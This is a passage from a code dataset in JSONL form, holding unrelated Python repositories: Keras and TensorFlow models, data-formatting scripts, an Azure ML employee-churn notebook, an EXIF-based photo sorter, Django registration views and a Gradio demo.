1)))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation(\"relu\"))\r\nmodel.add(MaxPooling2D((2,2),strides=(2,2)))\r\nmodel.add(Dropout(DROPOUT))\r\n\r\nmodel.add(Flatten())\r\nmodel.add(Dense(1024))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation(\"relu\"))\r\nmodel.add(Dropout(DROPOUT))\r\nmodel.add(Dense(512))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation(\"relu\"))\r\nmodel.add(Dropout(DROPOUT))\r\nmodel.add(Dense(256))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation(\"relu\"))\r\nmodel.add(Dropout(DROPOUT))\r\nmodel.add(Dense(128))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation(\"relu\"))\r\nmodel.add(Dropout(DROPOUT))\r\n\r\nmodel.add(Dense(7))\r\nmodel.add(Activation(\"softmax\"))\r\nmodel.summary()\r\n\r\nmodel.compile(optimizer='adam',\r\n loss='categorical_crossentropy',\r\n metrics=['accuracy'])\r\nmodel.fit(data,label,epochs=1,callbacks=callbacks,batch_size=128,validation_split=0.1)\r\n\r\n\r\nmodel.save('model.h5')\r\n","repo_name":"r05942017/ML2017FALL","sub_path":"hw3/hw3_train.py","file_name":"hw3_train.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18753686086","text":"from __future__ import absolute_import, division, print_function, unicode_literals\nfrom keras.preprocessing import image\nfrom keras.applications.vgg16 import preprocess_input\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nfrom Image_Captioning.model import *\nfrom Image_Captioning.batch_feature import image_features_model, load_image\nfrom Image_Captioning.process_caption import proc_caption\nimport cv2\nimport pickle as pk\nlabel_encoder = pk.load(open('label_encoder_lstm.sav','rb'))\n\n'''\nVQA Model configurations\n'''\n\nimg_dim = 
4096\nword2vec_dim = 300\n#max_len = 30 # Required only when using Fixed-Length Padding\nnum_hidden_nodes_mlp = 1024\nnum_hidden_nodes_lstm = 512\nnum_layers_mlp = 3\nnum_layers_lstm = 3\ndropout = 0.5\nactivation_mlp = 'tanh'\n\n'''\nImage captioning model configurations\n'''\n\ntotal_size =100000\ntop_k = 5000\nembedding_dim = 256\nunits = 512\nvocab_size = top_k + 1 \nattention_features_shape = 64\n\n\n\ndef load_image_features_model():\n ''' \n Returns the image features extracting model\n '''\n\n base_model = tf.keras.applications.VGG16(weights='imagenet')\n image_model = tf.keras.Model(inputs=base_model.input, outputs=base_model.layers[-2].output)\n return image_model\n\nimage_model = load_image_features_model()\n\ndef get_image_features(image_model, image_path):\n ''' Returns numpy array\n Extracts the image features using VGG16\n\n Args:\n image_model: image features extracting model\n image_path: location of image\n '''\n\n img = cv2.imread(image_path)\n I = cv2.resize(img, (224, 224)) # - np.array((103.939, 116.779, 123.680), dtype=np.float32)\n x = image.img_to_array(I)\n x = np.expand_dims(x, axis=0)\n x = preprocess_input(x)\n image_features = image_model.predict(x)\n image_features = np.asarray(image_features, dtype=np.float32)\n return image_features\n\ndef get_question_features(question, nlp):\n ''' Returns numpy array\n Converts the question into an array of vectors using word2vec model\n\n Args:\n question: question in string format\n nlp: word2vec model\n '''\n\n tokens = nlp(question)\n question_features = np.zeros((1, len(tokens), 300))\n for j in range(len(tokens)):\n question_features[0,j,:] = tokens[j].vector\n return question_features\n\ndef load_vqa_model():\n '''\n Forms, compiles, and returns the VQA model\n '''\n\n image_model = tf.keras.Sequential([tf.keras.layers.Reshape(input_shape = (img_dim,), target_shape=(img_dim,), name='Feeding_image_vectors_size_4096')], name='Image_Model')\n image_model.add(tf.keras.layers.Dense(num_hidden_nodes_mlp, kernel_initializer='uniform', name = 'Image_MLP_Hidden_layer_size_1024'))\n image_model.add(tf.keras.layers.Activation('tanh', name='Image_MLP_Activation_tanh'))\n image_model.add(tf.keras.layers.Dropout(0.5, name='Image_MLP_Dropout_0.5'))\n\n language_model = tf.keras.Sequential([tf.keras.layers.LSTM(num_hidden_nodes_lstm,return_sequences=True, input_shape=(None, word2vec_dim), name='Feeding_question_vectors_to_LSTM_Layer_1'),\n tf.keras.layers.LSTM(num_hidden_nodes_lstm, return_sequences=True, name='LSTM_layer_2'),\n tf.keras.layers.LSTM(num_hidden_nodes_lstm, return_sequences=False, name='LSTM_layer_3')\n ], name = 'Language_Model')\n language_model.add(tf.keras.layers.Dense(num_hidden_nodes_mlp, kernel_initializer='uniform', name = 'Question_MLP_Hidden_layer_size_1024'))\n language_model.add(tf.keras.layers.Activation('tanh', name='Question_MLP_Activation_tanh'))\n language_model.add(tf.keras.layers.Dropout(0.5, name='Question_MLP_Dropout_0.5'))\n\n upper_lim = 1000 \n\n merged=tf.keras.layers.concatenate([language_model.output,image_model.output], axis =-1, name='Merging_language_model_and_image_model')\n\n model =tf.keras.Sequential(name='CNN_LSTM_Model')(merged)\n model = tf.keras.layers.Dense(num_hidden_nodes_mlp, kernel_initializer='uniform', name = 'Combined_MLP_Hidden_layer_size_1024')(model)\n model = tf.keras.layers.Activation('tanh', name='Combined_MLP_Activation_tanh')(model)\n model = tf.keras.layers.Dropout(0.5, name='Combined_MLP_Dropout_0.5')(model)\n model = tf.keras.layers.Dense(upper_lim, 
name='Fully_Connected_Output_layer_size_1000')(model)\n out = tf.keras.layers.Activation(\"softmax\", name='Softmax_Output_Probablities')(model)\n model = tf.keras.Model([language_model.input, image_model.input], out, name='LSTM_CNN_Model')\n model.load_weights('weights_cnn_lstm_v2/LSTM_1000classes_epoch_59.hdf5')\n model.compile(loss='categorical_crossentropy', optimizer='rmsprop')\n return model\n\ndef predict_answer(model, nlp, question, image_path):\n ''' Returns a string\n Gets the image features and questions features, and predicts the answer using VQA model\n\n Args:\n model: VQA model\n nlp: word2vec model\n question: question in string format\n ''' \n\n image_features = get_image_features(image_model,image_path)\n question_features = get_question_features(question, nlp)\n input_data = [question_features, image_features]\n y_predict = model.predict(input_data, verbose=0)\n y_predict = np.argmax(y_predict,axis=1)\n return label_encoder.inverse_transform(y_predict)[0]\n\ndef load_image_caption_model():\n ''' Returns encoder model, decoder model image_features_extract_model, tokenizer and max length of caption\n Forms, compiles, and loads the image caption model\n '''\n\n train_captions,img_name_vector = np.load('./Image_Captioning/traincaption_imgname.npy')\n img_name_vector = img_name_vector[:total_size].tolist()\n train_captions = train_captions[:total_size].tolist()\n\n image_features_extract_model = image_features_model()\n \n _, tokenizer, max_length = proc_caption(train_captions) \n\n #MODEL STARTS HERE\n encoder = CNN_Encoder(embedding_dim)\n decoder = RNN_Decoder(embedding_dim, units, vocab_size)\n\n #OPTIMIZER \n optimizer = tf.keras.optimizers.Adam()\n\n #CHECKPOINTS\n checkpoint_path = \"./Image_Captioning/checkpoints/train100000\"\n ckpt = tf.train.Checkpoint(encoder=encoder,decoder=decoder,optimizer = optimizer)\n ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5)\n\n if ckpt_manager.latest_checkpoint:\n # restoring the latest checkpoint in checkpoint_path\n ckpt.restore(ckpt_manager.latest_checkpoint).expect_partial()\n\n return encoder, decoder, image_features_extract_model, tokenizer, max_length\n\ndef generate_caption(image_path, encoder, decoder, image_features_extract_model, tokenizer, max_length):\n ''' Returns string and tensorflow object\n Given an image, generates a caption\n\n Args:\n image_path: location of the image\n encoder: encoder model\n decoder: decoder model\n image_features_extract_model: model which extracts the image features\n tokenizer: tokenizer \n max_length: maximum length of the caption\n '''\n\n attention_plot = np.zeros((max_length, attention_features_shape))\n\n hidden = decoder.reset_state(batch_size=1)\n\n temp_input = tf.expand_dims(load_image(image_path)[0], 0)\n img_tensor_val = image_features_extract_model(temp_input)\n img_tensor_val = tf.reshape(img_tensor_val, (img_tensor_val.shape[0], -1, img_tensor_val.shape[3]))\n\n features = encoder(img_tensor_val)\n\n dec_input = tf.expand_dims([tokenizer.word_index['']], 0)\n result = []\n\n for i in range(max_length):\n predictions, hidden, attention_weights = decoder(dec_input, features, hidden)\n\n attention_plot[i] = tf.reshape(attention_weights, (-1, )).numpy()\n\n predicted_id = tf.random.categorical(predictions, 1)[0][0].numpy()\n result.append(tokenizer.index_word[predicted_id])\n\n if tokenizer.index_word[predicted_id] == '':\n return result, attention_plot\n\n dec_input = tf.expand_dims([predicted_id], 0)\n\n attention_plot = 
attention_plot[:len(result), :]\n return result, attention_plot\n\ndef plot_image_caption_attention(result, attention_plot, image):\n '''\n Plots the attention over the image\n '''\n \n temp_image = np.array(Image.open(image))\n n=0\n fig = plt.figure(num=n, figsize=(120,120))\n\n len_result = len(result)\n j =0\n for l in range(len_result):\n #print(\"l is:\", l, len_result, \"len_result//6\", len_result//6)\n temp_att = np.resize(attention_plot[l], (8, 8))\n if((l%10)==0 and l >0):\n #ax = fig.add_subplot(len_result//6, len_result//6, l+1)\n n+=1\n j =0\n fig = plt.figure( num=n,figsize=(120,120))\n ax = fig.add_subplot(3,4, j+1)\n else:\n ax = fig.add_subplot(3,4,j+1)\n j+=1\n ax.set_title(result[l])\n img = ax.imshow(temp_image)\n ax.imshow(temp_att, cmap='gray', alpha=0.6, extent=img.get_extent())\n plt.tight_layout(pad=50, w_pad=50.0, h_pad=50.0)\n \n plt.tight_layout(pad=50, w_pad=50.0, h_pad=50.0)\n plt.show()","repo_name":"shivmohith/Visual-Assistance-for-the-Blind","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9246,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"74607061287","text":"'''Buatlah program yang dapat menerima inputan berupa angka \r\ndengan ketentuan sebagai berikut:\r\n1. Angka yang dimasukkan melalui input adalah batas atas \r\nangka\r\n2. Program menampilkan jumlah angka yang habis dibagi 3\r\nContoh angka yang diinput adalah 10, maka jawabannya \r\nadalah 3, karena ada 3 angka yang habis dibagi 3 yaitu 3, 6 \r\ndan 9 '''\n\nangka = int(input(\"angka : \" ))\n\nfor i in range (3,angka+1,3):\n\tprint(i)\n","repo_name":"Rhmawthy/days100_coding","sub_path":"sisah bagi3.py","file_name":"sisah bagi3.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7493840977","text":"import importlib\nimport torch\n\nfrom gem.models.sensor.run_utils import config_sensor, get_sensor_by_checkpoint\nfrom gem.models.predictor.run_utils import config_predictor, get_predictor_by_checkpoint\nfrom gem.controllers.run_utils import config_controller, get_controller_by_checkpoint\nfrom gem.envs.imagine import Imagine\n\ndef config_serial_agent(config):\n sensor_param = {\n \"c\" : config['image_channel'],\n \"h\" : config['image_size'],\n \"w\" : config['image_size'],\n }\n\n sensor, sensor_param, _ = config_sensor(config, sensor_param)\n predictor, predictor_param, _ = config_predictor(config)\n world_model = Imagine(sensor, predictor, with_emb=config['with_emb'])\n config['state_dim'] = world_model.state_dim\n config['action_dim'] = world_model.action_dim\n controller, controller_param, _ = config_controller(config)\n\n filename = '_'.join([config['controller'], config['predictor'], config['sensor'], config['env']])\n if len(config['suffix']) > 0:\n filename = filename + '_' + config['suffix']\n\n return world_model, controller, sensor_param, predictor_param, controller_param, filename\n\ndef get_serial_agent_by_checkpoint(checkpoint, eval_mode=True):\n sensor = get_sensor_by_checkpoint(checkpoint, eval_mode=eval_mode)\n predictor = get_predictor_by_checkpoint(checkpoint, eval_mode=eval_mode)\n controller = get_controller_by_checkpoint(checkpoint, eval_mode=eval_mode)\n\n return sensor, predictor, 
controller","repo_name":"IcarusWizard/GEM","sub_path":"gem/serial/run_utils.py","file_name":"run_utils.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"42490122282","text":"# UNI: jjl2245, me2680\n\"\"\"Formats the Korean OpenSLR dataset\"\"\"\n\nfrom os import listdir\nfrom os.path import isfile, join, exists\nimport csv\nimport sys\nfrom pandas import read_csv\nimport numpy\n\npath = '../../data/KR' # set the KR data root directory\ndef get_files_folders(path): # gets all files and folders in a directory\n    files = [f for f in listdir(path) if isfile(join(path, f))] # gets the files\n    folders = [f for f in listdir(path) if not isfile(join(path, f))] # gets the folders\n    return files, folders \n\nfiles, folders = get_files_folders(path) \nfor folder in folders: # for each folder\n    temp_path = path + '/' + folder # join the paths to make a new path\n    temp_path = temp_path + '/' + get_files_folders(temp_path)[-1][0]\n    \n    in_files, in_folders = get_files_folders(temp_path) # Get the files and folders within this filepath\n    text_files = [] # store the text files\n    for file in in_files: # for each file\n        if file.endswith('.trans.txt'): # if it ends with '.trans.txt'\n            text_files.append(file) # then store it in the text files list\n    text_file = text_files[0] # we start with the first text file\n\n    with open(temp_path + '/' + text_file) as f: # open the text file\n        lines = f.readlines() # read all lines\n        for line in lines: # for each line\n            split = line.split(\" \", 1) # split it on the first space only\n            this_file = split[0] # the first part is the file name\n            text = split[-1] # the rest of it is a transcription\n            if exists(temp_path + '/' + this_file + '.flac'): # if there exists a flac file corresponding to the filename\n                with open(temp_path + '/' + this_file + '.txt', 'w') as f: # open the text file corresponding to it\n                    f.write(text) # write the transcription \n\n    \n\n\n\n    \n\n\n","repo_name":"jjlee0802cu/open-set-lid","sub_path":"s5_r3/scripts/scripts_data/KR_formater.py","file_name":"KR_formater.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"32656017594","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n# Connecting to existing Azure Machine Learning workspace\nimport os\nfrom azureml.core import Workspace\nfrom azureml.core.authentication import ServicePrincipalAuthentication\n\nws = Workspace.get(name='ws_employee_churn', auth=None, subscription_id='9c43f403-ce9b-4e3a-8f7f-21b1688e2873', resource_group='rg_datascience')\ncluster_type = os.environ.get(\"AML_COMPUTE_CLUSTER_TYPE\", \"CPU\")\ncompute_target = ws.get_default_compute_target(cluster_type)\n\n\n# In[ ]:\n\n\n#Read and pre-process data\nimport pandas as pd\nimport numpy as np\n\nhr = pd.read_csv('HR_Data.csv')\ncol_names = hr.columns.tolist()\n\ncol_names\ncat_vars=['Age Bucket', 'Decade', 'Gender', 'Marital Status', 'Cost Center', 'Managed By', 'Designation', 'Employee Band', 'Experience']\nfor var in cat_vars:\n    cat_list='var'+'_'+var\n    cat_list = pd.get_dummies(hr[var], prefix=var,drop_first=False)\n    hr1=hr.join(cat_list)\n    hr=hr1\n\nhr.drop(hr.columns[[0,1,2,3,4,5,6,7,8,9]], axis=1, inplace=True)\nhr.columns.values\n\nhr_vars=hr.columns.values.tolist()\ny=['Left']\nX=[i for i in hr_vars if i not in y]\n\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.utils import resample\n#\n# Convert dataframe into numpy objects and split them into\n# train and test sets: 80/20\nX = hr.loc[:, hr.columns != \"Left\"].values\ny = hr.loc[:, hr.columns == \"Left\"].values.flatten()\nX_train, X_test, y_train, y_test = train_test_split(\n    X, y, test_size=0.2, stratify=y, random_state=1)
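\n\n# Editorial sketch (added by the editor; not part of the original notebook):\n# a quick look at the class imbalance that motivates the upsampling step\n# below. 'Left' is the binary attrition target used throughout; its 0/1\n# coding is an assumption.\nprint('Train class counts:', np.bincount(y_train.astype(int)))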
\n\nX_train_u, y_train_u = resample(X_train[y_train == 1],\n                                y_train[y_train == 1],\n                                replace=True,\n                                n_samples=X_train[y_train == 0].shape[0],\n                                random_state=1)\nX_train_u = np.concatenate((X_train[y_train == 0], X_train_u))\ny_train_u = np.concatenate((y_train[y_train == 0], y_train_u))\nprint(\"Upsampled shape:\", X_train_u.shape, y_train_u.shape)\n\n\nfrom sklearn.pipeline import make_pipeline\n\n\n# In[ ]:\n\n\n# Build and register Random forest classifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.externals import joblib\nfrom azureml.core import Run\nfrom azureml.core.model import Model\n\nrun = Run.get_context()\nrf = RandomForestClassifier(n_estimators=10,max_features = \"sqrt\",\n            min_samples_leaf=5,criterion=\"entropy\",class_weight=\"balanced\")\nrf.fit(X_train_u, y_train_u)\n\n# Place the model file in the outputs folder.\nos.makedirs('outputs', exist_ok=True)\njoblib.dump(value=rf, filename='outputs/emp_churn_model_rf.pkl')\n\n# register the model Azure \nmodel = Model.register(model_path = \"outputs/emp_churn_model_rf.pkl\",\n                       model_name = \"emp_churn_model_rf\",\n                       tags = {'area': \"employee churn\", 'type': \"random forest\"},\n                       description = \"Random forest model to predict employee churn\",\n                       workspace = ws)\nprint(model.name, model.id, model.version, sep='\\t')\n\n\n# In[ ]:\n\n\n#Build and register Logistic regression model\nfrom sklearn.linear_model import LogisticRegression\nfrom azureml.core import Run\nfrom sklearn.externals import joblib\nfrom azureml.core.model import Model\n\nrun = Run.get_context()\n\nlogmod = LogisticRegression(solver = \"liblinear\",C=0.5,penalty=\"l2\",fit_intercept=True,class_weight=\"balanced\")\nlogmod.fit(X_train_u, y_train_u)\n\nfrom sklearn.metrics import accuracy_score\nprint('Logistic regression accuracy: {:.3f}'.format(accuracy_score(y_test, logmod.predict(X_test))))\n\n# Place the model file in the outputs folder.\nos.makedirs('outputs', exist_ok=True)\njoblib.dump(value=logmod, filename='outputs/emp_churn_model.pkl')\n\n# register the model Azure \nmodel = Model.register(model_path = \"outputs/emp_churn_model.pkl\",\n                       model_name = \"emp_churn_model\",\n                       tags = {'area': \"employee churn\", 'type': \"regression\"},\n                       description = \"Logistic regression model to predict employee churn\",\n                       workspace = ws)\nprint(model.name, model.id, model.version, sep='\\t')\n\n\n# In[ ]:\n\n\nprint(run.get_file_names())\n\n\n# In[ ]:\n\n\nfrom azureml.core import Workspace\nfrom azureml.core.model import Model\nimport os \n\nmodel=Model(ws, 'emp_churn_model')\nmodel.download(target_dir=os.getcwd(), exist_ok=True)\n\n# verify the downloaded model file\nfile_path = os.path.join(os.getcwd(), \"emp_churn_model.pkl\")\n\nos.stat(file_path)\n\n\n# In[ ]:\n\n\n#Code snippet to check the web service\nimport requests\nimport json\nimport pandas as pd\nfrom azureml.core.model import Model\nfrom sklearn.externals import joblib\n\n\nhr = pd.read_csv('predictions.csv')\nscoring_uri = 'http://690e1634-fd94-4f55-a10e-bc3a57004dd2.southeastasia.azurecontainer.io/score'\n# If the service is authenticated, set the key\nkey = ''\n\n\n# Convert to JSON string\ninput_data = hr.to_json(orient='records')\n\n# Set the content type\nheaders = {'Content-Type': 'application/json'}
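\n\n# Editorial note (sketch; not in the original snippet): 'key' above is never\n# attached to the request. If the endpoint required authentication, the usual\n# pattern would be something like:\n#     headers['Authorization'] = f'Bearer {key}'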
\n\n# Make the request and display the response\nresp = requests.post(scoring_uri, input_data, headers=headers)\nprint(resp.text)\n\n\n# In[ ]:\n\n\nimport pandas as pd\n#input_df = pd.read_json(input_df, orient='records')\ninput_df_encoded = input_df\n\ncolumns_encoded = ['Age Bucket_20', 'Age Bucket_30', 'Age Bucket_40',\n       'Age Bucket_Teen', 'Decade_60', 'Decade_70', 'Decade_80',\n       'Decade_90', 'Gender_F', 'Gender_M', 'Marital Status_Married',\n       'Marital Status_Unmarried', 'Cost Center_Abbott - A',\n       'Cost Center_Abbott - B', 'Cost Center_Abbott - C',\n       'Cost Center_CPL', 'Cost Center_Cadila Pharma',\n       'Cost Center_Cassel', 'Cost Center_East', 'Cost Center_Elite',\n       'Cost Center_Endo', 'Cost Center_FDC', 'Cost Center_Fourrts',\n       'Cost Center_Galderma', 'Cost Center_Glenmark Cuticare',\n       'Cost Center_Glenmark General', 'Cost Center_Hilton',\n       'Cost Center_Indus', 'Cost Center_Innova', 'Cost Center_Lifescan',\n       'Cost Center_Magna', 'Cost Center_North', 'Cost Center_North ',\n       'Cost Center_Novo HI', 'Cost Center_SKF', 'Cost Center_Surelife ',\n       'Cost Center_Unison', 'Cost Center_Zydus Alidac',\n       'Cost Center_Zydus Allidac', 'Cost Center_Zydus CND',\n       'Cost Center_Zydus CND ', 'Cost Center_Zydus Cadila',\n       'Cost Center_Zydus Cardiva', 'Cost Center_Zydus Respicare',\n       'Managed By_Principle Managed', 'Managed By_SHL Managed',\n       'Designation_Assistant Field Manager', 'Designation_Field Manager',\n       'Designation_Medical Advicer',\n       'Designation_Medical Marketing Executive',\n       'Designation_Medical Representative',\n       'Designation_Senior Field Manager',\n       'Designation_Senior Medical Marketing Executive',\n       'Designation_Senior Product Specialist', 'Employee Band_5',\n       'Employee Band_6', 'Employee Band_7', 'Experience_Fresher',\n       'Experience_Non Pharma', 'Experience_Other', 'Experience_Pharma']\n    \ncat_vars=['Age Bucket', 'Decade', 'Gender', 'Marital Status', 'Cost Center', 'Managed By', 'Designation', 'Employee Band', 'Experience']\nfor var in cat_vars:\n    cat_list='var'+'_'+var\n    cat_list = pd.get_dummies(input_df[var], prefix=var,drop_first=False)\n    hr1=input_df.join(cat_list)\n    input_df=hr1\nfor column_encoded in columns_encoded:\n    if not column_encoded in input_df.columns:\n        input_df_encoded[column_encoded] = 0\n    \nprint(input_df_encoded.columns)\nprint(input_df.columns)\n\n\n# In[ ]:\n\n\nprint(input_df_encoded)\ndf_cd = pd.merge(input_df_encoded, input_df, how='inner')\ndf_cd\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"mewanalwis/ChurnPrediction","sub_path":"ChurnModel.py","file_name":"ChurnModel.py","file_ext":"py","file_size_in_byte":7473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"42447854372","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport sys\n\ndist = list()\ntime = list()\n\nfp = open(sys.argv[1])\n\n#read file\nwhile fp:\n    line = fp.readline()\n    if line:\n        x, y = line.split()\n        time.append(float(x))\n        dist.append(float(y))\n    else:\n        break\n\n#standard deviation of the distances\ndist_pd = pd.Series(dist)\nstd = dist_pd.std()\n\n#Avogadro number\nNa = 6.0221409 * 10 ** 23\n\n#Boltzmann constant (J/K)\nk_b = 1.380649 * 10 ** (-23)\n\n#temperature 310 K\nTemp = 310\n\n#formula\nk_therm = k_b * Temp * Na / 1000 / (std ** 2)\n\n#result\nprint(\"k_thermal is \" + str(k_therm) + \" 
kJ/mol/A^2\")\n","repo_name":"wang-py/Q10_entrance_plots","sub_path":"k_calculator.py","file_name":"k_calculator.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4510154913","text":"import os\nimport magic\nimport exifread\nimport datetime\nimport tempfile\nfrom shutil import copyfile\n\n########## NOTES\n# Checking for duplicates\n# 1. List file paths with their sizes\n# 2. From previous list create another one with files of same size and their md5 sums\n# 3. Check for duplicate md5 sums\n#\n########## TO-DO List\n# Check for duplicates\n# Tests!\n# More interactive\n# Refactor setOutputDirectory and iterateFiles\n# Other exif filters\n# Yaps readme, help messages\n#\n\n\nclass Yaps:\n    def __init__(self, logger):\n        self.logger = logger\n        self.UNKNOWN_DIR = 'unknown_date'\n        self.directory = ''\n        self.outputDirectory = ''\n        self.sizeListFile = False\n\n    def setDirectory(self, directory):\n        if(os.path.isdir(directory)):\n            self.directory = directory\n        else:\n            raise FileNotFoundError('Directory not found')\n\n    def setOutputDirectory(self, directory):\n        if(os.path.isdir(directory)):\n            if not os.access(directory, os.W_OK):\n                raise Exception('Directory not writable')\n\n            self.outputDirectory = directory\n        else:\n            raise FileNotFoundError('Output directory not found')\n\n    def checkDuplicates(self):\n        self.sizeListFile = self.createSizeListFile()\n        self.storeFilesSize()\n        sameSizeList = self.checkForSameSize()\n        \n\n    def createSizeListFile(self):\n        temporaryFile = tempfile.TemporaryFile('a+')\n        self.logger.putLog(str(temporaryFile))\n        return temporaryFile\n\n    def storeFilesSize(self):\n        for filename in os.listdir(self.directory):\n            size = str(os.path.getsize(self.directory + '/' + filename))\n            self.sizeListFile.write(filename + \"\\t\" + size + \"\\n\")\n            self.logger.putLog(filename + \"\\t\" + size)\n\n    def checkForSameSize(self):\n        # sizeListFile is an already-open temporary file, so rewind and read it\n        # instead of calling open() on the file object (which raises TypeError)\n        self.sizeListFile.seek(0)\n        return self.sizeListFile.read().splitlines()\n\n    def iterateFiles(self):\n        for filename in os.listdir(self.directory):\n            self.logger.putLog('File found: ' + filename)\n            fullFilePath = self.directory + '/' + filename\n            if(os.path.isdir(fullFilePath)):\n                continue\n            if(self.checkIfImage(fullFilePath)):\n                imageDate = self.readExifData(fullFilePath)\n\n                if imageDate:\n                    dirName = self.getDirNameByDate(imageDate)\n                else:\n                    dirName = self.UNKNOWN_DIR\n\n                self.createDirIfNotExist(dirName)\n\n                if(self.outputDirectory):\n                    target = self.outputDirectory + '/' + dirName + '/' + filename\n                else:\n                    target = './' + dirName + '/' + filename\n                self.copyFileIfNotExist(fullFilePath, target)\n\n    def checkIfImage(self, filename):\n        BMP_MIME = 'image/bmp'\n        JPEG_MIME = 'image/jpeg'\n        GIF_MIME = 'image/gif'\n\n        mime = magic.Magic(mime=True)\n        file_mime = mime.from_file(filename)\n        if(file_mime == BMP_MIME or file_mime == JPEG_MIME or file_mime == GIF_MIME):\n            return True\n        else:\n            return False\n\n    def readExifData(self, filename):\n        f = open(filename, 'rb')\n        tags = exifread.process_file(f, details=False)\n        f.close()\n\n        if 'EXIF DateTimeOriginal' in tags:\n            self.logger.putLog(\"Picture was shot on: \" + str(tags['EXIF DateTimeOriginal']))\n            return tags['EXIF DateTimeOriginal'].values\n        else:\n            return False\n\n    def getDirNameByDate(self, date):\n        try:\n            return datetime.datetime.strptime(date, '%Y:%m:%d %H:%M:%S').strftime('%Y-%m-%d')\n        except (ValueError, TypeError):\n            return self.UNKNOWN_DIR\n\n    def createDirIfNotExist(self, name):\n        if(self.outputDirectory):\n            directory = self.outputDirectory + '/' + name\n        else:\n            directory = './' + name\n\n        if(os.path.isdir(directory)):\n            return\n        os.mkdir(directory)
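\n\n    # Editorial note (sketch): os.makedirs(directory, exist_ok=True) would\n    # collapse the isdir()/mkdir() pair above into a single race-free call;\n    # left as a comment so the original behaviour is unchanged.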
\n\n    def copyFileIfNotExist(self, src, target):\n        return copyfile(src, target)\n\n    def help(self):\n        pass\n","repo_name":"PoliPyc/YAPS","sub_path":"src/yaps/yaps.py","file_name":"yaps.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"22963129897","text":"# -*- coding:utf-8 -*-\nfrom django.shortcuts import render, redirect\nfrom .forms import RegisterForm\nfrom django.core.mail import send_mail\nfrom django.conf import settings\n\n# Create your views here.\ndef register(request):\n    # get the value of the 'next' parameter from the GET or POST request\n    # in a GET request, next is passed in the url, i.e. /?next = value\n    # in a POST request, next is passed through the form, i.e. an <input> field\n    redirect_to = request.POST.get('next', request.GET.get('next', ''))\n    if request.method == 'POST':\n        # instantiate a registration form with the submitted data\n        form = RegisterForm(request.POST)\n        # validate the submitted data\n        if form.is_valid():\n            form.save()\n            # registration succeeded, redirect back to the home page\n            if redirect_to:\n                return redirect(redirect_to)\n            else:\n                return redirect('/')\n    else:\n        # not a POST request, so show the user an empty registration form\n        form = RegisterForm()\n    # Render the template.\n    # If the user is visiting the registration page, an empty form is rendered.\n    # If the user submitted the form but validation failed, a form with error messages is rendered.\n    return render(request, 'wechat/register.html', context={'form':form,'next':redirect_to})\n\ndef index(request):\n    return render(request, 'index.html')\n\ndef send(request):\n    if request.method == 'POST':\n        email = request.POST.get('email')\n        print(email)\n        #tulps = eval(email)\n        #print(tulps)\n        msg='你收到这封邮件是因为你请求重置你在网站 127.0.0.1:8000上的用户账户密码。请访问该页面并选择一个新密码:http://127.0.0.1:8000/users/reset/NA/4n8-64ab7ff92254d18c6b15/&#13;
你的用户名,如果已忘记的话: admin
感谢使用我们的站点!
127.0.0.1:8000 团队'\n send_mail('测试邮件01',\n msg,\n settings.EMAIL_FROM,\n [email])\n return render(request, 'registration/password_reset_done.html')\n\n\n\n\n","repo_name":"tengxt/wechatSystem","sub_path":"wechat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"16512292007","text":"'''给定一个非空整数数组,除了某个元素只出现一次以外,其余每个元素均出现两次。找出那个只出现了一次的元素。\n\n说明:\n\n你的算法应该具有线性时间复杂度。 你可以不使用额外空间来实现吗?\n\n示例 1:\n\n输入: [2,2,1]\n输出: 1\n示例 2:\n\n输入: [4,1,2,1,2]\n输出: 4'''\n# 数学真神奇 操\n\nclass Solution:\n def singleNumber(self, nums: 'List[int]') -> 'int':\n a = 0\n for num in nums:\n #print (num)\n a = a ^ num\n print (a)\n return a\ns=Solution()\nb=[1,2,3,4,4,3,2]\nprint(s.singleNumber(b))","repo_name":"xuejieshougeji0826/leetcode_top100","sub_path":"136.py","file_name":"136.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28614303310","text":"import gradio as gr\nimport random\nimport time\nfrom unit_test_generator_yield import unit_tests_from_function\nfrom threading import Thread\n\nwith gr.Blocks() as demo:\n msg = gr.TextArea(lines=20, placeholder=\"Enter your function under test here\")\n chatbot = gr.Chatbot()\n submit_button = gr.Button(\"Submit\")\n clear = gr.ClearButton([msg, chatbot])\n\n def user(user_message, history):\n return user_message, history + [[None, None]]\n\n def bot(msg, history):\n def print_to_console(text: str, end: str = \"\\n\"):\n if end == \"\\n\":\n # create a new entry in the history\n history.append([\"\", \"\"])\n 